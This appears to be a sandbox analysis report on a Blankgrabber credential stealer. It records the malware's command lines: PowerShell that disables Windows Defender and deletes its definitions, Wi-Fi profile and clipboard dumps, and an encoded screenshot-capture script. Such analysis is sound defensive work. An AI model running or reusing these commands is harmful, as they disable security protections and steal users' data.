Analysis Overview
SHA256
b292fb3552d852e570b5b8cd46843c6a128387c244fcc34c4427dbd0a6ee5ebc
Threat Level: Known bad
The file loader.exe was found to be: Known bad.
Malicious Activity Summary
A stealer written in Python and packaged with Pyinstaller
Blankgrabber family
Command and Scripting Interpreter: PowerShell
Loads dropped DLL
Reads user/profile data of web browsers
UPX packed file
Executes dropped EXE
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Enumerates physical storage devices
Kills process with taskkill
Checks SCSI registry key(s)
Suspicious use of AdjustPrivilegeToken
Gathers system information
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Enumerates processes with tasklist
Detects videocard installed
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-28 21:31
Signatures
A stealer written in Python and packaged with Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blankgrabber family
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-28 21:31
Reported
2024-05-28 21:34
Platform
win10v2004-20240226-en
Max time kernel
145s
Max time network
152s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI29282\rar.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\loader.exe
"C:\Users\Admin\AppData\Local\Temp\loader.exe"
C:\Users\Admin\AppData\Local\Temp\loader.exe
"C:\Users\Admin\AppData\Local\Temp\loader.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\loader.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Invalid Key!', 0, 'Error', 0+16);close()""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\loader.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Invalid Key!', 0, 'Error', 0+16);close()"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\g3r3edbo\g3r3edbo.cmdline"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
